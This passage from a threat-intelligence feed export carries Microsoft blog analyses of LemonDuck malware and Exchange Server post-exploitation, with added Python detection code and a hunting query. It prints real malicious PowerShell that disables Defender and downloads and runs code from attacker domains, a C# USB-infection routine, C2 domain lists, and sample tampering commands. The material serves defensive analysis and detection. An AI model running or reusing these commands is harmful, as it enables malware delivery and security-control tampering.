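    return {dev: len(cmds) for dev, cmds in per_device.items()
            if low <= len(cmds) <= high
            and any(has_any(c, KILLER_TASK_NAMES) for c in cmds)}


def _event(device, file_name, cmd, parent="cmd.exe /c echo benign"):
    return {"DeviceId": device, "FileName": file_name,
            "ProcessCommandLine": cmd, "InitiatingProcessCommandLine": parent}


# Constructed sample: one tampering event, two LemonDuck task creations, one
# benign task creation, a 42-line killer burst on dev-A and a small one on dev-B.
SAMPLE_EVENTS = [
    _event("dev-A", "powershell.exe", "powershell -w hidden -c Set-MpPreference",
           parent='powershell -w hidden -c "Set-MpPreference -DisableRealtimeMonitoring 1; '
                  'Add-MpPreference -ExclusionProcess C:\\ "'),
    _event("dev-A", "schtasks.exe",
           'schtasks.exe /create /sc minute /mo 1 /tn blackball /tr "cmd /c echo x" /F'),
    _event("dev-A", "schtasks.exe",  # task name qX7vLm\Zp2Rk is made up
           r'schtasks.exe /create /ru system /sc MINUTE /mo 60 /tn qX7vLm\Zp2Rk /F '
           r'/tr "powershell -w hidden -c PS_CMD"'),
    _event("dev-B", "schtasks.exe",
           'schtasks.exe /create /sc daily /tn "Nightly Backup" /tr C:\\backup.exe'),
] + [_event("dev-A", "schtasks.exe", f'schtasks.exe /Delete /TN "task{i}" /F')
     for i in range(40)] + [
    _event("dev-A", "schtasks.exe", 'schtasks.exe /Delete /TN "Mysa" /F'),
    _event("dev-A", "schtasks.exe", 'schtasks.exe /Delete /TN "Oracle Java Update" /F'),
    _event("dev-B", "schtasks.exe", 'schtasks.exe /Delete /TN "Mysa" /F'),
]


if __name__ == "__main__":
    print("defender tampering :", len(defender_tampering(SAMPLE_EVENTS)))
    print("lemonduck tasks    :", len(lemonduck_task_creation(SAMPLE_EVENTS)))
    print("killer bursts      :", competition_killer(SAMPLE_EVENTS))
```

The aggregation in rule 3 is the part worth porting carefully: the blog's query counts distinct `/Delete` command lines per device, not raw event volume, so a noisy host that re-runs the same deletion many times does not trip the 40-80 band.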
[Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAMWQuwrCYAyFzyz4DqWTgvgGDmK9gYigu5S22IK20op18OH9Erro4OAiIZc_OTknbaRMdxVKyDvVqrxqsDn9TKVu1H319FSgVjm9Gg-0ZlYwLRR7LHX6YFjQPVNvQVx8Z4IFCnUF1TpT44xnbEx-4OGPajPqCxYzS7VxjG3mdBodiaYygH9J_6YV-IY8BZ26irFYDDXCDZN0dd5hbTaE0y6s2PnHXWv432cHNvZs1J3-9_vtHfn_L9Gt0E952_Wxf90Lt1_r6hICAAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where InitiatingProcessFileName == \"powershell.exe\" \n| where InitiatingProcessCommandLine has_all(\"GetHostAddresses\",\"etc\",\"hosts\") \nor InitiatingProcessCommandLine has_all(\"GetHostAddresses\",\"IPAddressToString\",\"etc\",\"hosts\",\"DownloadData\")`\n\n \n\n[Learn how your organization can stop attacks through automated, cross-domain security and built-in AI with Microsoft Defender 365](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>).\n\n \n\nThe post [When coin miners evolve, Part 2: Hunting down LemonDuck and LemonCat attacks](<https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-29T19:00:59", "type": "mssecure", "title": "When coin miners evolve, Part 2: Hunting down LemonDuck and LemonCat attacks", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": 
{"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0144", "CVE-2017-8464", "CVE-2019-0708", "CVE-2020-0796", "CVE-2021-26855", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-07-29T19:00:59", "id": "MSSECURE:4A6B394DCAF12E05136AE087248E228C", "href": "https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-30T00:08:30", "description": "_[Note: In this two-part blog series, we expose a modern malware infrastructure and provide guidance for protecting against the wide range of threats it enables. Part 1 covers the evolution of the threat, how it spreads, and how it impacts organizations. [Part 2](<https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/>) is a deep dive on the attacker behavior and will provide investigation guidance.] _\n\nCombating and preventing today's threats to enterprises require comprehensive protection focused on addressing the full scope and impact of attacks. Anything that can gain access to machines\u2014even so-called commodity malware\u2014can bring in more dangerous threats. We\u2019ve seen this in banking Trojans serving as entry point for ransomware and hands-on-keyboard attacks. LemonDuck, an actively updated and robust malware that\u2019s primarily known for its botnet and cryptocurrency mining objectives, followed the same trajectory when it adopted more sophisticated behavior and escalated its operations. 
Today, beyond using resources for its traditional bot and mining activities, LemonDuck steals credentials, removes security controls, spreads via emails, moves laterally, and ultimately drops more tools for human-operated activity.\n\nLemonDuck\u2019s threat to enterprises is also in the fact that it\u2019s a cross-platform threat. It\u2019s one of a few documented bot malware families that targets Linux systems as well as Windows devices. It uses a wide range of spreading mechanisms\u2014phishing emails, exploits, USB devices, brute force, among others\u2014and it has shown that it can quickly take advantage of news, events, or the release of new exploits to run effective campaigns. For example, in 2020, it was observed using COVID-19-themed lures in email attacks. In 2021, it exploited newly patched [Exchange Server vulnerabilities](<https://www.microsoft.com/security/blog/2021/03/25/analyzing-attacks-taking-advantage-of-the-exchange-server-vulnerabilities/>) to gain access to outdated systems.\n\nThis threat, however, does not just limit itself to new or popular vulnerabilities. It continues to use older vulnerabilities, which benefit the attackers at times when focus shifts to patching a popular vulnerability rather than investigating compromise. Notably, LemonDuck removes other attackers from a compromised device by getting rid of competing malware and preventing any new infections by patching the same vulnerabilities it used to gain access.\n\nIn the early years, LemonDuck targeted China heavily, but its operations have since expanded to include many other countries, focusing on the manufacturing and IoT sectors. Today, LemonDuck impacts a very large geographic range, with the United States, Russia, China, Germany, the United Kingdom, India, Korea, Canada, France, and Vietnam seeing the most encounters.\n\n\n\n_Figure 1. 
Global distribution of LemonDuck botnet activity_\n\nIn 2021, LemonDuck campaigns started using more diversified command and control (C2) infrastructure and tools. This update supported the marked increase in hands-on-keyboard actions post-breach, which varied depending on the perceived value of compromised devices to the attackers. Despite all these upgrades, however, LemonDuck still utilizes C2s, functions, script structures, and variable names for far longer than the average malware. This is likely due to its use of bulletproof hosting providers such as Epik Holdings, which are unlikely to take any part of the LemonDuck infrastructure offline even when reported for malicious actions, allowing LemonDuck to persist and continue to be a threat.\n\nIn-depth research into malware infrastructures of various sizes and operations provides invaluable insight into the breadth of threats that organizations face today. In the case of LemonDuck, the threat is cross-platform, persistent, and constantly evolving. Research like this emphasizes the importance of having comprehensive visibility into the wide range of threats, as well as the ability to correlate simple, disparate activity such as coin mining to more dangerous adversarial attacks.\n\n## LemonDuck and LemonCat infrastructure\n\nThe earliest documentation of LemonDuck was from its cryptocurrency campaigns in May 2019. These campaigns included PowerShell scripts that employed additional scripts kicked off by a scheduled task. The task was used to bring in the PCASTLE tool to achieve a couple of goals: abuse the EternalBlue SMB exploit, as well as use brute force or pass-the-hash to move laterally and begin the operation again. Many of these behaviors are still observed in LemonDuck campaigns today.\n\nLemonDuck is named after the variable \u201cLemon_Duck\u201d in one of the said PowerShell scripts. The variable is often used as the user agent, in conjunction with assigned numbers, for infected devices. 
The format used two sets of alphabetical characters separated by dashes, for example: \u201cUser-Agent: Lemon-Duck-[A-Z]-[A-Z]\u201d. The term still appears in PowerShell scripts, as well as in many of the execution scripts, specifically in a function called SIEX, which is used to assign a unique user-agent during botnet connection in attacks as recently as June 2021.\n\nLemonDuck frequently utilizes open-source material built off of resources also used by other botnets, so there are many components of this threat that would seem familiar. Microsoft researchers are aware of two distinct operating structures, which both use the LemonDuck malware but are potentially operated by two different entities for separate goals.\n\nThe first, which we call the \u201cDuck\u201d infrastructure, uses historical infrastructures discussed in this report. It is highly consistent in running campaigns and performs limited follow-on activities. This infrastructure is seldom seen in conjunction with edge device compromise as an infection method, and is more likely to have random display names for its C2 sites, and is always observed utilizing \u201cLemon_Duck\u201d explicitly in script.\n\nThe second infrastructure, which we call \u201cCat\u201d infrastructure\u2014for primarily using two domains with the word \u201ccat\u201d in them (_sqlnetcat[.]com_, _netcatkit[.]com_)\u2014emerged in January 2021. It was used in attacks exploiting vulnerabilities in Microsoft Exchange Server. Today, the Cat infrastructure is used in attacks that typically result in backdoor installation, credential and data theft, and malware delivery. 
It is often seen delivering the malware Ramnit.\n\n \n\n**Sample Duck domains** | **Sample Cat domains** \n---|--- \n \n * cdnimages[.]xyz\n * bb3u9[.]com\n * zz3r0[.]com\n * pp6r1[.]com\n * amynx[.]com\n * ackng[.]com\n * hwqloan[.]com\n * js88[.]ag\n * zer9g[.]com\n * b69kq[.]com\n| \n\n * sqlnetcat[.]com\n * netcatkit[.]com\n * down[.]sqlnetcat[.]com\n\n \n \nThe Duck and Cat infrastructures use similar subdomains, and they use the same task names, such as \u201cblackball\u201d. Both infrastructures also utilize the same packaged components hosted on similar or identical sites for their mining, lateral movement, and competition-removal scripts, as well as many of the same function calls.\n\nThe fact that the Cat infrastructure is used for more dangerous campaigns does not deprioritize malware infections from the Duck infrastructure. Instead, this intelligence adds important context for understanding this threat: the same set of tools, access, and methods can be re-used at dynamic intervals, to greater impact. Despite common implications that cryptocurrency miners are less threatening than other malware, their core functionality mirrors that of non-monetized malware, making any botnet infection worthy of prioritization.\n\n\n\n_Figure 2. LemonDuck attack chain from the Duck and Cat infrastructures_\n\n## Initial access\n\nLemonDuck spreads in a variety of ways, but the two main methods are (1) compromises that are either edge-initiated or facilitated by bot implants moving laterally within an organization, or (2) bot-initiated email campaigns.\n\nLemonDuck acts as a loader for many other follow-on activities, but one of its main functions is to spread by compromising other systems. 
Since its first appearance, the LemonDuck operators have leveraged scans against both Windows and Linux devices for open or weakly authenticated SMB, Exchange, SQL, Hadoop, REDIS, RDP, or other edge devices that might be vulnerable to password spray or application vulnerabilities like CVE-2017-0144 (EternalBlue), CVE-2017-8464 (LNK RCE), CVE-2019-0708 (BlueKeep), CVE-2020-0796 (SMBGhost), CVE-2021-26855 (ProxyLogon), CVE-2021-26857 (ProxyLogon), CVE-2021-26858 (ProxyLogon), and CVE-2021-27065 (ProxyLogon).\n\nOnce inside a system with an Outlook mailbox, as part of its normal exploitation behavior, LemonDuck attempts to run a script that utilizes the credentials present on the device. The script instructs the mailbox to send copies of a phishing message with preset messages and attachments to all contacts.\n\nBecause of this method of contact messaging, security controls that rely on determining if an email is sent from a suspicious sender don\u2019t apply. This means that email security policies that reduce scanning or coverage for internal mail need to be re-evaluated, as sending emails through contact scraping is very effective at bypassing email controls.\n\nFrom mid-2020 to March 2021, LemonDuck\u2019s email subjects and body content have remained static, as have the attachment names and formats. 
These attachment names and formats have changed very little from similar campaigns that occurred in early 2020.\n\n \n\n**Sample email subjects ** | **Sample email body content** \n---|--- \n \n * The Truth of COVID-19\n * COVID-19 nCov Special info WHO\n * HALTH ADVISORY:CORONA VIRUS\n * WTF\n * What the fcuk\n * good bye\n * farewell letter\n * broken file\n * This is your order?\n| \n\n * Virus actually comes from United States of America\n * very important infomation for Covid-19\n * see attached document for your action and discretion.\n * the outbreak of CORONA VIRUS is cause of concern especially where forign personal have recently arrived or will be arriving at various intt in near future.\n * what's wrong with you?are you out of your mind!!!!!\n * are you out of your mind!!!!!what 's wrong with you?\n * good bye, keep in touch\n * can you help me to fix the file,i can't read it\n * file is brokened, i can't open it \n \nThe attachment used for these lures is one of three types: .doc, .js, or a .zip containing a .js file. Whatever the type, the file is named \u201creadme\u201d. Occasionally, all three types are present in the same email.\n\n\n\n_Figure 3. Sample email_\n\nWhile the JavaScript is detected by many security vendors, it might be classified with generic detection names. It could be valuable for organizations to sanitize JavaScript or VBScript executing or calling prompts (such as PowerShell) directly from mail downloads through solutions such as [custom detection rules](<https://docs.microsoft.com/en-us/microsoft-365/security/defender/custom-detection-rules?view=o365-worldwide>).\n\nSince LemonDuck began operating, the .zip to .js file execution method is the most common. The JavaScript has replaced the scheduled task that LemonDuck previously used to kickstart the PowerShell script. This PowerShell script has looked very similar throughout 2020 and 2021, with minor changes depending on the version, indicating continued development. 
Below is a comparison of changes from the most recent iterations of the email-delivered downloads and those from April of 2020.\n\n \n\n**April 2020 PowerShell script** | **March 2021 PowerShell script** \n---|--- \n`var cmd =new ActiveXObject(\"WScript.Shell\");var cmdstr=\"cmd /c start /b notepad \"+WScript.ScriptFullName+\" & powershell -w hidden -c \\\"if([Environment]::OSVersion.version.Major -eq '10'){Set-ItemProperty -Path 'HKCU:\\Environment' -Name 'windir' -Value 'cmd /c powershell -w hidden Set-MpPreference -DisableRealtimeMonitoring 1 & powershell -w hidden IEx(New-Object Net.WebClient).DownLoadString(''http://t.awcna.com/mail.jsp?js*%username%*%computername%''+[Environment]::OSVersion.version.Major) &::';sleep 1;schtasks /run /tn \\\\Microsoft\\\\Windows\\\\DiskCleanup\\\\SilentCleanup /I;Remove-ItemProperty -Path 'HKCU:\\Environment' -Name 'windir' -Force}else{IEx(ne`w-obj`ect Net.WebC`lient).DownloadString('http://t.awcna.com/7p.php');bpu -method migwiz -Payload 'powershell -w hidden IEx(New-Object Net.WebClient).DownLoadString(''http://t.awcna.com/mail.jsp?js*%username%*%computername%''+[Environment]::OSVersion.version.Majo \n//This File is broken.` | `var cmd =new ActiveXObject(\"WScript.Shell\");var cmdstr=\"cmd /c start /b notepad \"+WScript.ScriptFullName+\" & powershell -w hidden IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString('http://t.z'+'z3r0.com/7p.php?0.7*mail_js*%username%*%computername%*'+[Environment]::OSVersion.version.Major);bpu ('http://t.z'+'z3r0.com/mail.jsp?js_0.7')\";cmd.run(cmdstr,0,1); \n//This File is broken.` \n \n \n\nAfter the emails are sent, the inbox is cleaned to remove traces of these mails. This method of self-spreading is attempted on any affected device that has a mailbox, regardless of whether it is an Exchange server.\n\nOther common methods of infection include movement within the compromised environment, as well as through USB and connected drives. 
These processes are often kicked off automatically and have occurred consistently throughout the entirety of LemonDuck\u2019s operation.\n\nThese methods run as a series of C# scripts that gather available drives for infection. They also create a running list of drives that are already infected based on whether it finds the threat already installed. Once checked against the running list of infected drives, these scripts attempt to create a set of hidden files in the home directory, including a copy of _readme.js_. Any device that has been affected by the LemonDuck implants at any time could have had any number of drives attached to it that are compromised in this manner. This makes this behavior a possible entry vector for additional attacks.\n\n`DriveInfo[] drives = DriveInfo.GetDrives(); \nforeach (DriveInfo drive in drives) \n{ \nif (blacklist.Contains(drive.Name)) \n{ continue;} \nConsole.WriteLine(\"Detect drive:\"+drive.Name); \nif (IsSupported(drive)) \n{ \nif (!File.Exists(drive + home + inf_data)) \n{ \nConsole.WriteLine(\"Try to infect \"+drive.Name); \nif (CreateHomeDirectory(drive.Name) && Infect(drive.Name)) \n{ \nblacklist.Add(drive.Name); \n} \n} \nelse { \nConsole.WriteLine(drive.Name+\" already infected!\"); \nblacklist.Add(drive.Name); \n} \n} \nelse{ \nblacklist.Add(drive.Name);`\n\n## Comprehensive protection against a wide-ranging malware operation\n\nThe cross-domain visibility and coordinated defense delivered by [Microsoft 365 Defender](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>) is designed for the wide range and increasing sophistication of threats that LemonDuck exemplifies. Microsoft 365 Defender has AI-powered industry-leading protections that can stop multi-component threats like LemonDuck across domains and across platforms. Microsoft 365 Defender for Office 365 detects the malicious emails sent by the LemonDuck botnet to deliver malware payloads as well as spread the bot loader. 
Microsoft Defender for Endpoint detects and blocks LemonDuck implants, payloads, and malicious activity on Linux and Windows.\n\nMore importantly, Microsoft 365 Defender provides rich investigation tools that can expose detections of LemonDuck activity, including attempts to compromise and gain a foothold on the network, so security operations teams can efficiently and confidently respond to and resolve these attacks. Microsoft 365 Defender correlates cross-platform, cross-domain signals to paint the end-to-end attack chain, allowing organizations to see the full impact of an attack. We also published a threat analytics article on this threat. Microsoft 365 Defender customers can use this report to get important technical details, guidance for investigation, consolidated incidents, and steps to mitigate this threat in particular and modern cyberattacks in general.\n\nIn Part 2 of this blog series, we share our in-depth technical analysis of the malicious actions that follow a LemonDuck infection. These include general, automatic behavior as well as human-initialized behavior. We will also provide guidance for investigating LemonDuck attacks, as well as mitigation recommendations for strengthening defenses against these attacks. 
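A small check for the drive-borne infection described earlier in this post (the C# routine that copies a hidden _readme.js_ onto each attached drive). This is an added example, not code from the Microsoft blog or from LemonDuck: the post does not name the directory the copy is placed in, so the scan covers each drive root plus one level of subdirectories, and treating the email lure names (readme.js, readme.zip, readme.doc) as the drive-borne names is an assumption. The directory tree built by `demo_tree()` is constructed for the demo.

```python
"""Added example (not code from the Microsoft blog): look for the hidden
readme.js lure on attached drives. LURE_NAMES and the scan depth are
assumptions; demo_tree() builds a constructed drive image for testing."""
import os
import stat
import tempfile
from pathlib import Path

LURE_NAMES = {"readme.js", "readme.zip", "readme.doc"}   # assumption, see lead-in
HIDDEN_ATTR = getattr(stat, "FILE_ATTRIBUTE_HIDDEN", 0x2)


def is_hidden(path):
    """Hidden attribute on Windows (st_file_attributes); dot-prefix elsewhere."""
    attrs = getattr(path.stat(), "st_file_attributes", 0)
    return bool(attrs & HIDDEN_ATTR) or path.name.startswith(".")


def scan_root(root, depth=1):
    """Return lure files under `root`, walking at most `depth` directory levels.
    Each finding records whether the file, and its directory, carry the hidden flag."""
    root = Path(root)
    findings = []
    if not root.is_dir():
        return findings
    pending = [(root, 0)]
    while pending:
        directory, level = pending.pop()
        try:
            entries = list(directory.iterdir())
        except OSError:          # unreadable, or the USB stick was unplugged mid-scan
            continue
        for entry in entries:
            if entry.is_file() and entry.name.lower() in LURE_NAMES:
                findings.append({
                    "path": str(entry),
                    "hidden": is_hidden(entry),
                    "parent_hidden": directory != root and is_hidden(directory),
                })
            elif entry.is_dir() and level < depth:
                pending.append((entry, level + 1))
    return sorted(findings, key=lambda f: f["path"])


def candidate_roots():
    """Drive letters on Windows; the usual removable mount points elsewhere."""
    if os.name == "nt":
        return [f"{c}:\\" for c in "DEFGHIJKLMNOPQRSTUVWXYZ" if os.path.isdir(f"{c}:\\")]
    roots = []
    for base in ("/media", "/mnt", "/Volumes"):
        if os.path.isdir(base):
            roots.extend(str(p) for p in Path(base).iterdir() if p.is_dir())
    run_media = Path("/run/media")           # /run/media/<user>/<volume> on many desktops
    if run_media.is_dir():
        roots.extend(str(v) for u in run_media.iterdir() if u.is_dir()
                     for v in u.iterdir() if v.is_dir())
    return roots


def scan(roots=None):
    """Map each root that has findings to its list of findings."""
    roots = candidate_roots() if roots is None else roots
    result = {}
    for r in roots:
        found = scan_root(r)
        if found:
            result[str(r)] = found
    return result


def demo_tree():
    """Constructed drive image: a root-level readme.js, a README.zip inside a
    hidden directory, and a harmless file. Returns the root path."""
    root = Path(tempfile.mkdtemp(prefix="lemonduck-demo-"))
    (root / ".sys").mkdir()
    (root / "readme.js").write_text("// constructed placeholder, not the real lure\n")
    (root / ".sys" / "README.zip").write_bytes(b"PK\x05\x06" + b"\x00" * 18)  # empty zip
    (root / "notes.txt").write_text("clean\n")
    return str(root)


if __name__ == "__main__":
    for root, found in scan([demo_tree()] + candidate_roots()).items():
        for f in found:
            print(f"{root}: {f['path']} hidden={f['hidden']} parent_hidden={f['parent_hidden']}")
```

A hit is a reason to pull the drive for imaging rather than delete the file: the post notes that any drive attached to an infected host may carry the copy, so the set of hosts the drive has visited is the lead worth chasing.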
**READ: [When coin miners evolve, Part 2: Hunting down LemonDuck and LemonCat attacks](<https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/>).**\n\n \n\n_Microsoft 365 Defender Threat Intelligence Team_\n\nThe post [When coin miners evolve, Part 1: Exposing LemonDuck and LemonCat, modern mining malware infrastructure](<https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-22T16:00:57", "type": "mssecure", "title": "When coin miners evolve, Part 1: Exposing LemonDuck and LemonCat, modern mining malware infrastructure", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0144", "CVE-2017-8464", "CVE-2019-0708", "CVE-2020-0796", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-07-22T16:00:57", "id": 
"MSSECURE:E537BA51663A720821A67D2A4F7F7F0E", "href": "https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mmpc": [{"lastseen": "2021-03-26T05:28:04", "description": "Microsoft continues to monitor and investigate attacks exploiting the recent on-premises Exchange Server vulnerabilities. These attacks are now performed by multiple threat actors ranging from financially motivated cybercriminals to state-sponsored groups. To help customers who are not able to immediately install updates, Microsoft [released a one-click tool](<https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>) that automatically mitigates one of the vulnerabilities and scans servers for known attacks. Microsoft also [built this capability into Microsoft Defender Antivirus](<https://www.microsoft.com/security/blog/2021/03/18/automatic-on-premises-exchange-server-mitigation-now-in-microsoft-defender-antivirus/>), expanding the reach of the mitigation. As of today, we have seen a significant decrease in the number of still-vulnerable servers \u2013 more than 92% of known worldwide Exchange IPs are now patched or mitigated. We continue to work with our customers and partners to mitigate the vulnerabilities.\n\nAs organizations recover from this incident, we continue to publish guidance and share threat intelligence to help detect and evict threat actors from affected environments. Today, we are sharing intelligence about what some attackers did after exploiting the vulnerable servers, ranging from ransomware to data exfiltration and deployment of various second-stage payloads. 
This blog covers:\n\n * Threat intelligence and technical details about known attacks, including components and attack paths, that defenders can use to investigate whether on-premises Exchange servers were compromised before they were patched and to comprehensively respond to and remediate these threats if they see them in their environments.\n * Detection and automatic remediation built into Microsoft Defender Antivirus and how investigation and remediation capabilities in solutions like Microsoft Defender for Endpoint can help responders perform additional hunting and remediate threats.\n\nAlthough the overall numbers of ransomware have remained extremely small to this point, it is important to remember that these threats show how quickly attackers can pivot their campaigns to take advantage of newly disclosed vulnerabilities and target unpatched systems, demonstrating how critical it is for organizations to apply security updates as soon as possible. We strongly urge organizations to identify and update vulnerable on-premises Exchange servers, and to follow mitigation and investigation guidance that we have collected and continue to update here: <https://aka.ms/ExchangeVulns>.\n\n## Mitigating post-exploitation activities\n\nThe first known attacks leveraging the Exchange Server vulnerabilities were by the nation-state actor HAFNIUM, which we detailed in [this blog](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>). In the three weeks after the Exchange server vulnerabilities were disclosed and the security updates were released, Microsoft saw numerous other attackers adopting the exploit into their toolkits. Attackers are known to rapidly work to reverse engineer patches and develop exploits. 
In the case of a remote code execution (RCE) vulnerability, the rewards are high for attackers who can gain access before an organization patches, as patching a system does not necessarily remove the access of the attacker.\n\n\n\n_Figure 1. The Exchange Server exploit chain_\n\nIn our investigation of the on-premises Exchange Server attacks , we saw systems being affected by multiple threats. **Many of the compromised systems have not yet received a secondary action**, such as human-operated ransomware attacks or data exfiltration, indicating attackers could be establishing and keeping their access for potential later actions. These actions might involve performing follow-on attacks via persistence on Exchange servers they have already compromised, or using credentials and data stolen during these attacks to compromise networks through other entry vectors.\n\nAttackers who included the exploit in their toolkits, whether through modifying public proof of concept exploits or their own research, capitalized on their window of opportunity to gain access to as many systems as they could. Some attackers were advanced enough to remove other attackers from the systems and use multiple persistence points to maintain access to a network.\n\nWe have built protections against these threats into Microsoft security solutions. Refer to the Appendix for a list of indicators of compromise, detection details, and advanced hunting queries. We have also provided additional tools and investigation and remediation guidance here: <https://aka.ms/exchange-customer-guidance>.\n\nWhile performing a full investigation on systems is recommended, the following themes are common in many of the attacks. These are prevailing threat trends that Microsoft has been monitoring, and existing solutions and recommendations for prevention and mitigation apply:\n\n * Web shells - As of this writing, many of the unpatched systems we observed had multiple web shells on them. 
Microsoft has been tracking the rise of web shell attacks for the past few years, ensuring our products detect these threats and providing remediation guidance for customers. For more info on web shells, read [Web shell attacks continue to rise](<https://www.microsoft.com/security/blog/2021/02/11/web-shell-attacks-continue-to-rise/>). We have also published guidance on [web shell threat hunting with Azure Sentinel](<http://aka.ms/exchange-web-shell-investigation>).\n * Human-operated ransomware - Ransomware attacks pose some of the biggest security risks for organizations today, and attackers behind these attacks were quick to take advantage of the on-premises Exchange Server vulnerabilities. Successfully exploiting the vulnerabilities gives attackers the ability to launch human-operated ransomware campaigns, a trend that Microsoft has been closely monitoring. For more information about human-operated ransomware attacks, including Microsoft solutions and guidance for improving defenses, read: [Human-operated ransomware attacks](<https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/>).\n * Credential theft \u2013 While credential theft is not the immediate goal of some of these attacks, access to Exchange servers allowed attackers to access and potentially steal credentials present on the system. Attackers can use these stolen credentials for follow-on attacks later, so organizations need to prioritize identifying and remediating impacted identities. For more information, read best practices for building credential hygiene.\n\nIn the following sections, we share our analysis of known post-compromise activities associated with exploitation of the Exchange server vulnerabilities because it is helpful to understand these TTPs, in order to defend against other actors using similar tactics or tools. 
While levels of disruptive post-compromise activity like ransomware may be limited at the time of this writing, Microsoft will continue to track this space and share information with the community. It\u2019s important to note that with some post-compromise techniques, attackers may gain highly privileged persistent access, but **many of the impactful subsequent attacker activities can be mitigated by practicing the principle of least privilege and mitigating lateral movement**.\n\n## DoejoCrypt ransomware\n\nDoejoCrypt was the first ransomware to appear to take advantage of the vulnerabilities, starting to encrypt in limited numbers shortly after the patches were released. Ransomware attackers often use multiple tools and exploits to gain initial access, including purchasing access through a broker or \u201creseller\u201d who sells access to systems they have already compromised. The DoejoCrypt attacks start with a variant of the Chopper web shell being deployed to the Exchange server post-exploitation.\n\nThe web shell writes a batch file to _C:\\Windows\\Temp\\xx.bat_. Found on all systems that received the DoejoCrypt ransomware payload, this batch file performs a backup of the Security Account Manager (SAM) database and the System and Security registry hives, allowing the attackers later access to passwords of local users on the system and, more critically, in the LSA Secrets portion of the registry, where passwords for services and scheduled tasks are stored.\n\n\n\n_Figure 2. xx.bat_\n\nGiven configurations that administrators typically use on Exchange servers, many of the compromised systems are likely to have had at least one service or scheduled task configured with a highly privileged account to perform actions like backups. 
**As service account credentials are not frequently changed, this could provide a great advantage to an attacker even if they lose their initial web shell access due to an antivirus detection**, as the account can be used to elevate privileges later, which is why we strongly recommend operating under the principle of least privileged access.\n\nThe batch file saves the registry hives to a semi-unique location, _C:\\windows\\temp\\debugsms_, assembles them into a CAB file for exfiltration, and then cleans up the folders from the system. The file also enables Windows Remote Management and sets up an HTTP listener, indicating the attacker might take advantage of the internet-facing nature of an Exchange Server and use this method for later access if other tools are removed.\n\n\n\n_Figure 3. xx.bat actions_\n\nThe _xx.bat_ file has been run on many more systems than have been ransomed by the DoejoCrypt attacker, meaning that, while not all systems have moved to the ransom stage, the attacker has gained access to multiple credentials. On systems where the attacker moved to the ransom stage, we saw reconnaissance commands being run via the same web shell that dropped the _xx.bat_ file (in this instance, a version of Chopper):\n\n\n\n_Figure 4. DoejoCrypt recon command_\n\nAfter these commands are completed, the web shell drops a new payload to _C:\\Windows\\Help_ which, like in many human-operated ransomware campaigns, leads to the attack framework Cobalt Strike. In observed instances, the downloaded payload is shellcode with the file name _new443.exe_ or _Direct_Load.exe_. When run, this payload injects itself into _notepad.exe_ and reaches out to a C2 to download Cobalt Strike 